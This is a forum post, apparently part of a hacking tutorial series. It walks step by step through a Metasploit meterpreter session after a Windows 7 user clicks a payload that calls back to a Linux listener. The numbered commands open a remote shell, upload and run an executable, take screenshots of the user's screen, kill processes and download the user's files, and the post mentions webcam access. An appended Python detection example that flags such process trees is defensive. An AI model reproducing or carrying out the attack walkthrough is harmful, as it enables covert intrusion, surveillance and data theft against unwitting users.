Learn About Computers

Teaching about Computers


    24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux


    Post by Aof on Mon May 28, 2018 12:06 am


    24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux
    ----
    Note: I skipped the first 2 or 3 minutes of the video so that everything
    would be viewable instantly and you wouldn't have to watch an idle 3 minutes of nothing happening.
    1. When the user double left clicks on the Payload that was previously created,
    the payload sends a signal to our machine running Linux, and our Linux System is then able to enter the Windows 7 system through a backdoor.
    2. sessions -i = is typed in the Linux machine to check for active connections. One is found, but the information fails to display, so we wait a few seconds and perform the command again.
    3. sessions -i = is entered again. We see the ID is "2": a connection has been made with a Windows PC with an IP of 75.91.168.4 through its outgoing port 50393. The information displays the name of the user who clicked on the file and also the PC's name.
    It connects with the Linux PC, which has an IP address of 75.91.168.3, through the open port 1625, which was previously forwarded.
    4. sessions -i 2 = causes Linux's meterpreter session to connect to the session.
    5. pwd = is entered to find out where the Linux pc meterpreter session is located on the Windows 7 Pc.
    4. idletime = is entered to find out how long the Windows 7 user has been idle for. (idle means not moving mouse or pressing keys, no activity basically.)
    5. cd .. = Goes back a directory. You can navigate using the meterpreter session, but I would recommend navigating directory by directory, instead of trying to jump from 1 big path to another.
    6. cd .. = Goes back a directory
    7. dir = lists the current home directory of the User, the user's Desktop is visible from here.
    8. cd Desktop = navigates to the User's Desktop.
    9. ls = with the Meterpreter, you can also list items as you would in Linux, or you can use "dir" as you would with Windows Command Prompt.
    On the Desktop, I notice there's a Google Chrome.lnk short-cut link that can be accessed using the shell.
    In another terminal tab, I locate an auto-it script that I previously created before the video.
    10. upload '//root//Desktop//a//thef.exe' "C:\\Users\\user\\Desktop\\thef.exe" = we upload thef.exe from our usb drive's Desktop to the Windows 7 Pc using the Meterpreter session. Notice how we enclosed the Linux path with 'these' and the Windows path with "these". That is very important, otherwise it would not work with paths that include spaces in the directories/folders/files names. Also, double slashes are necessary when uploading or downloading files using the Meterpreter.
    11. dir = to view the file that we just uploaded.
    Remember earlier, how we saw the "Google Chrome.lnk" on the user's Desktop?
    12. shell = which changes the meterpreter session into the User's actual command prompt. It's now as if we are sitting in front of the Windows 7 computer using their keyboard.
    13. "Google Chrome.lnk" & timeout /t 12 & thef.exe = Starts Chrome from the short-cut in the present working directory, waits 12 seconds (just in case their pc is slow), then starts our auto-it script thef.exe that we uploaded.
    Even though our Linux terminal gives out an error, it doesn't matter, because it still worked regardless.
    14. exit = type exit one time, and just wait for the command prompt to change into the Meterpreter Session again.
    The Meterpreter Session will return once the Autoit script has finished running.
    15. screenshot = typing screenshot from meterpreter session will save a screenshot of the user's screen to the same folder that we previously started the msfconsole from our rc folder.
    It will also display a path to where you can find the screenshot after it saves.
    16. Using the GUI (graphical interface), we navigate and point & click to the rc folder, find the screenshot file that saved, and preview it in Linux.
    17. shell = We enter the user's command prompt shell again.
    18. tasklist = lists the running processes of the Windows User.
    "Ctrl+Shift+F" will allow you to search for text within the Linux Terminal.
    19. Chrome.exe = type chrome, or chrome.exe to find the chrome image name process. Once you find it, kill it by using the next command.
    20. taskkill /im chrome.exe /f = kills the Chrome Browser Process. (Note: the next time the browser opens, it will try to restore the previous session, keep this in mind, and re-open the process, kill it again if you don't want this to happen, I personally do not care.)
    21. exit = this time take notice how it exits the shell and goes back to the Meterpreter much quicker since we do not have an auto-it script running.
    22. screenshot = takes another screenshot which will be saved in the same place as it did earlier.
    Shell is like being in front of their machine executing commands,
    meterpreter gives the options of uploading, downloading files, and taking screenshots of the user's pc remotely, also as we'll get into later, viewing their webcam if they have an active one installed.
    23. idletime = I check the idletime of the machine again, notice how it's not much different than last time? It's because we ran the auto-it script, and that moved the user's mouse, it only started counting the idletime after the user's mouse quit moving again.
    24. dir = Lists the present working directory files again.
    25. cd sendout = Navigates to "sendout" folder on the user's Desktop.
    26. dir = lists the files of sendout folder.
    27. download videoerror.PNG = Downloads a *.PNG file called, "videoerror.PNG"
    It saves in the same location as our screenshot files saved to earlier.
    When you are ready to close the meterpreter session you can type, "background" if you plan to connect back to it or "exit" if you do not plan to connect to it again, and wish to close the meterpreter session.
    28. sessions -i = You can look at the active, and backgrounded sessions.
    29. sessions -k 1 = You can type sessions -k and an Id number to kill a meterpreter session that you have open from the msf exploit handler.
    30. sessions -i = shows no active sessions once you have killed or exited all open sessions, you are no longer connected to any meterpreter sessions.
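
Seen from the Windows 7 side, the session above leaves a recognisable process tree: a program started from the Desktop connects out to port 1625, then spawns cmd.exe, which in turn runs timeout, thef.exe, tasklist and taskkill. The following is an added detection example, not part of the original post; the event field names, the PIDs and the file name payload.exe are constructed for illustration, loosely modelled on process-creation and network-connection telemetry.

```python
import re
from collections import defaultdict

# Locations a standard user can write to; a shell whose parent runs from one is unusual.
USER_WRITABLE = re.compile(
    r"^C:\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.I)
SHELLS = {"cmd.exe", "powershell.exe"}
COMMON_PORTS = {80, 443}
D, S = r"C:\Users\user\Desktop", r"C:\Windows\System32"

def proc(pid, ppid, image, cmd):
    return {"type": "proc", "pid": pid, "ppid": ppid, "image": image, "cmd": cmd}

def net(pid, dst, dport):
    return {"type": "net", "pid": pid, "dst": dst, "dport": dport}

# Constructed sample events. "payload.exe" is a placeholder name; the address,
# port and thef.exe path are the ones quoted in the post.
EVENTS = [
    proc(1800, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    proc(4100, 1800, D + r"\payload.exe", "payload.exe"),
    net(4100, "75.91.168.3", 1625),
    proc(4200, 4100, S + r"\cmd.exe", "cmd.exe"),
    proc(4210, 4200, S + r"\timeout.exe", "timeout /t 12"),
    proc(4220, 4200, D + r"\thef.exe", "thef.exe"),
    proc(4300, 4100, S + r"\cmd.exe", "cmd.exe"),
    proc(4310, 4300, S + r"\tasklist.exe", "tasklist"),
    proc(4320, 4300, S + r"\taskkill.exe", "taskkill /im chrome.exe /f"),
    proc(5000, 1800, S + r"\cmd.exe", "cmd.exe"),   # benign: user opened a prompt
    proc(5010, 5000, S + r"\tasklist.exe", "tasklist"),
    proc(3000, 1800, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    net(3000, "203.0.113.10", 443),                 # benign browser traffic
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Group indicators under the user-writable executable at the root of the tree."""
    procs = {e["pid"]: e for e in events if e["type"] == "proc"}
    findings = defaultdict(list)
    for e in events:
        if e["type"] == "net":
            p = procs.get(e["pid"])
            if p and USER_WRITABLE.match(p["image"]) and e["dport"] not in COMMON_PORTS:
                findings[p["pid"]].append(f"outbound {e['dst']}:{e['dport']}")
            continue
        parent = procs.get(e["ppid"])
        grand = procs.get(parent["ppid"]) if parent else None
        if parent and basename(e["image"]) in SHELLS and USER_WRITABLE.match(parent["image"]):
            findings[parent["pid"]].append(f"spawned shell pid {e['pid']}")
        if grand and basename(parent["image"]) in SHELLS and USER_WRITABLE.match(grand["image"]):
            findings[grand["pid"]].append(f"shell child: {e['cmd']}")
    return dict(findings)
```

Only the Desktop-resident process is reported; the prompt the user opened from explorer.exe and the browser's port 443 traffic produce no findings.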
